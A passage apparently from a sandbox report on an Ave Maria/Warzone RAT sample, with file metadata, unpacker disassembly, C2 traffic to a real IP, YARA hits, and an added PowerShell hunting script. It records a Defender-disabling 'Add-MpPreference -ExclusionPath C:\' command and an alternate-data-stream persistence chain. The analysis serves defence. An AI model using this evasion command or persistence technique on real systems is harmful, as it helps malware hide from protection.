                        SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys36JQAimXv:Yw7gJGWMXJXKSOdYiygKkXe/qeAiY
                        MD5:DA5950D62F7968DA1F66E3811A9061F9
                        SHA1:69B83F624AA9EC9EA09BE0E165499B436101F9EA
                        SHA-256:C09AF5F39B8BF613C007465A63F70E84766710CEE7FEB62780433C9D8C248AD7
                        SHA-512:6291C46BC66AEC7AEB973EE076146AF54C800A63F3F6F9C0EF01DA6535539E2F44FBF0BACBEAF66C4D34C4BE122AD728F62681E408FA710127120806D952DC9E
                        Malicious:false
                        Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ReturnValue = 9;..};....
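The dropped files above record the sample's persistence and defence-evasion chain: a programs.bat in the user's Startup folder whose visible body is a for /F "usebackq" loop that reads and executes each line of the file's own alternate data stream (programs.bat:start); that stream holds a wmic Win32_Process.Create call for a payload stored in an ADS attached to the C:\ProgramData directory (C:\ProgramData:ApplicationData); and two PowerShell transcripts of Add-MpPreference -ExclusionPath C:\, which excludes the entire system drive from Windows Defender scanning. The WMIC output file ending in ReturnValue = 9 is Win32_Process.Create's "Path not found" code, so at least one of those launches failed inside the sandbox. The PowerShell script below is an added hunting example written for this page; it is not part of the Joe Sandbox report or of the sample. It enumerates non-default NTFS streams on the Startup folders and on C:\ProgramData, flags Defender path exclusions that cover a whole drive, and searches PowerShell script-block logs (Event ID 4104) for Add-MpPreference. The Startup-folder paths, the regular expressions and the event-log query are assumptions chosen for the example; only programs.bat:start, C:\ProgramData:ApplicationData and the Add-MpPreference command come from the report.

```powershell
<#
  Added hunting script: not part of the Joe Sandbox report or of the sample it describes.
  Looks for the three host artefacts recorded in the dropped-files list:
    1. non-default NTFS alternate data streams (ADS) on Startup-folder files and on the
       C:\ProgramData directory (the sample used programs.bat:start and
       C:\ProgramData:ApplicationData);
    2. Windows Defender path exclusions covering a whole drive (the sample ran
       Add-MpPreference -ExclusionPath C:\);
    3. script-block log entries (Event ID 4104) that call Add-MpPreference.
  Run from an elevated PowerShell 5.1 or later session. Every path other than the two
  from the report is an assumption chosen for illustration.
#>
[CmdletBinding()]
param(
    [string[]] $Targets = @(
        "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
        "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup",
        $env:ProgramData
    )
)

# Streams a file may legitimately carry: the unnamed data stream and the
# Mark-of-the-Web zone stream. Anything else is reported.
$expectedStreams = @(':$DATA', 'Zone.Identifier')

function Get-SuspiciousStream {
    param([string[]] $Paths)
    foreach ($path in $Paths) {
        # The directory object itself is inspected too, because the sample attached its
        # payload stream to C:\ProgramData rather than to a file inside it.
        $objects  = @(Get-Item -LiteralPath $path -Force -ErrorAction SilentlyContinue)
        $objects += @(Get-ChildItem -LiteralPath $path -Force -File -ErrorAction SilentlyContinue)
        foreach ($obj in $objects) {
            $streams = Get-Item -LiteralPath $obj.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -notin $expectedStreams }
            foreach ($s in $streams) {
                # Read the stream head: a launcher line is a few dozen bytes, an embedded
                # executable starts with the 'MZ' signature.
                $head = Get-Content -LiteralPath $obj.FullName -Stream $s.Stream -Raw -ErrorAction SilentlyContinue
                if ($null -ne $head -and $head.Length -gt 200) { $head = $head.Substring(0, 200) }
                [pscustomobject]@{
                    Object   = $obj.FullName
                    Stream   = $s.Stream
                    Bytes    = $s.Length
                    Launcher = [bool]($head -match '(?i)\b(wmic|powershell|cmd|mshta|rundll32|regsvr32)\b')
                    IsPE     = [bool]($head -match '^MZ')
                    Head     = $head
                }
            }
        }
    }
}

function Get-BroadDefenderExclusion {
    # Get-MpPreference exists only where the Defender module is installed.
    if (-not (Get-Command Get-MpPreference -ErrorAction SilentlyContinue)) { return }
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    foreach ($p in @($pref.ExclusionPath)) {
        # A bare drive root such as C:\ switches off scanning for the whole volume.
        if ($p -match '^[A-Za-z]:\\?$') {
            [pscustomobject]@{ Exclusion = $p; Reason = 'excludes an entire drive' }
        }
    }
}

function Get-MpPreferenceScriptBlock {
    param([int] $MaxEvents = 5000)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Properties[2] of a 4104 event is the ScriptBlockText field.
            $text = [string] $_.Properties[2].Value
            if ($text -match '(?i)Add-MpPreference\s+-Exclusion') {
                [pscustomobject]@{ Time = $_.TimeCreated; ScriptBlock = $text.Trim() }
            }
        }
}

Write-Host '== Non-default alternate data streams =='
Get-SuspiciousStream -Paths $Targets | Format-Table -AutoSize -Wrap
Write-Host '== Drive-wide Defender exclusions =='
Get-BroadDefenderExclusion | Format-Table -AutoSize
Write-Host '== Add-MpPreference in script-block logs =='
Get-MpPreferenceScriptBlock | Format-Table -AutoSize -Wrap
```

Event ID 4104 is only populated when script block logging is enabled; the transcripts in this report come from the sandbox's own transcription, not from a default Windows setting. Confirmed streams can be deleted with Remove-Item -LiteralPath <file> -Stream <name> and the exclusion with Remove-MpPreference -ExclusionPath 'C:\'. A process started through Win32_Process.Create, as the wmic line here does, is spawned by WmiPrvSE.exe, so a child of WmiPrvSE.exe whose image path contains a colon after the drive letter is the shortest process-creation signature for this launch technique.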
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Entropy (8bit):7.862505245807072
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.66%
                        • UPX compressed Win32 Executable (30571/9) 0.30%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        File size:222720
                        MD5:dabc6f0c75c134e5310ba3526adba833
                        SHA1:854ec103a64182c97e8f25e45da04889dbbbf3ff
                        SHA256:9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf
                        SHA512:c596890bf6062890483e9ee276c890b04396c8c6c758b318ab0d218c506ae362db32e13faf9691b2b96d5a4ede03ee107c5b01714ab06c86c465ebd23326e877
                        SSDEEP:6144:DcsB/VWq2pmz2WGO3LPJRWE/4F0xXKk7ETkFI49Poih:DciKMoO3LDn4uxXKk7FI4d
                        TLSH:56241287323D8975D465A27C079AD56083B8FE074D9B853F615A338F4EBE472036EB20
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..............................................................................................1.......Y.............Rich...
                        Icon Hash:00828e8e8686b000
                        Entrypoint:0x553b50
                        Entrypoint Section:UPX1
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x62861233 [Thu May 19 09:47:31 2022 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:12223521b494f53df3a1fd878d789144
                        Instruction
                        pushad
                        mov esi, 0051F000h
                        lea edi, dword ptr [esi-0011E000h]
                        mov dword ptr [edi+0014B3ACh], 0BA0189Ah
                        push edi
                        jmp 00007FDC94A25773h
                        nop
                        nop
                        nop
                        nop
                        nop
                        nop
                        nop
                        mov al, byte ptr [esi]
                        inc esi
                        mov byte ptr [edi], al
                        inc edi
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDC94A2574Fh
                        mov eax, 00000001h
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        add ebx, ebx
                        jnc 00007FDC94A2576Dh
                        jne 00007FDC94A2578Ah
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDC94A25781h
                        dec eax
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        jmp 00007FDC94A25736h
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        jmp 00007FDC94A257B4h
                        xor ecx, ecx
                        sub eax, 03h
                        jc 00007FDC94A25773h
                        shl eax, 08h
                        mov al, byte ptr [esi]
                        inc esi
                        xor eax, FFFFFFFFh
                        je 00007FDC94A257D7h
                        sar eax, 1
                        mov ebp, eax
                        jmp 00007FDC94A2576Dh
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDC94A2572Eh
                        inc ecx
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007FDC94A25720h
                        add ebx, ebx
                        jne 00007FDC94A25769h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        add ebx, ebx
                        jnc 00007FDC94A25751h
                        jne 00007FDC94A2576Bh
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jnc 00007FDC94A25746h
                        add ecx, 02h
                        cmp ebp, 00000000h
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x154e5c | 0x1c0 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x154000 | 0xe5c | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x15501c | 0x28 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x153d4c | 0x18 | UPX1
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x153d6c | 0xc0 | UPX1
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        UPX0 | 0x1000 | 0x11e000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        UPX1 | 0x11f000 | 0x35000 | 0x35000 | False | 0.97481666421 | data | 7.88845284004 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc | 0x154000 | 0x2000 | 0x1200 | False | 0.366102430556 | data | 3.93920974475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country
                        TYPELIB | 0x15418c | 0x834 | data | English | United States
                        RT_DIALOG | 0x14dce0 | 0x1ae | data | English | United States
                        RT_STRING | 0x14de90 | 0x2e | data | English | United States
                        RT_VERSION | 0x1549c4 | 0x314 | data | English | United States
                        RT_MANIFEST | 0x154cdc | 0x17d | XML 1.0 document text | English | United States
                        DLL | Import
                        ADVAPI32.dll | AccessCheck
                        GDI32.dll | GetTextExtentPoint32A
                        KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                        ole32.dll | CoInitialize
                        OLEAUT32.dll | SysFreeString
                        SHELL32.dll | SHGetFileInfoA
                        USER32.dll | GetDC
                        Description | Data
                        LegalCopyright | Microsoft Corporation. All rights reserved.
                        InternalName | ATLDUCK
                        FileVersion | 1, 0, 0, 1
                        CompanyName |
                        ProductName | atlduck Module
                        OLESelfRegister |
                        ProductVersion | 1, 0, 0, 1
                        FileDescription | atlduck Module
                        OriginalFilename | ATLDUCK.DLL
                        Translation | 0x0409 0x04b0
                        Language of compilation system | Country where language is spoken | Map
                        English | United States |
                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                        05/22/22-12:33:29.604971 | TCP | 2834979 | ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        05/22/22-12:33:29.434739 | TCP | 2841903 | ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        May 22, 2022 12:33:29.163681984 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:29.296467066 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:29.296816111 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:29.434739113 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:29.604970932 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:29.769226074 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:29.770284891 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:29.953881025 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:29.954632044 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.137533903 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.420416117 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.420444012 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.420460939 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.420485020 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.420510054 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.420609951 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.420645952 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.553220987 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.553282976 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.553324938 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.553369045 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.553412914 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.553426981 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.553471088 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.553472042 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.553512096 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.553546906 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.553561926 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.553594112 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.553661108 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.686826944 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.686891079 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.686939001 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.686978102 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687000036 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.687016964 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687046051 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.687060118 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687100887 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687140942 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687141895 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.687180996 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687217951 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687257051 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.687258959 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687273979 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.687299013 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687340021 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687412977 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.687418938 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687458038 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687479973 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.687499046 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687530994 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.687588930 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.820411921 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.820503950 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.820561886 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.820605993 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.820616007 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.820658922 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.820702076 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.820735931 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.820755959 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.820768118 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.820805073 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.820844889 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.820872068 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.820894003 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.820935965 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.820965052 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.820995092 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821037054 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821079969 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821100950 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.821135044 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821176052 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821212053 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.821228981 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.821230888 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821276903 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821319103 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821356058 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.821368933 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821409941 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821453094 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821477890 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.821499109 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821541071 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821567059 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.821594954 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821604013 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.821641922 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821681976 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821716070 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.821729898 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821770906 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821813107 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
                        May 22, 2022 12:33:30.821840048 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
                        May 22, 2022 12:33:30.821858883 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3


                        Target ID:0
                        Start time:12:33:06
                        Start date:22/05/2022
                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe"
                        Imagebase:0x400000
                        File size:222720 bytes
                        MD5 hash:DABC6F0C75C134E5310BA3526ADBA833
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low

                        Target ID:1
                        Start time:12:33:12
                        Start date:22/05/2022
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:powershell Add-MpPreference -ExclusionPath C:\
                        Imagebase:0x1c0000
                        File size:430592 bytes
                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:high

                        Target ID:2
                        Start time:12:33:12
                        Start date:22/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c9170000
                        File size:625664 bytes
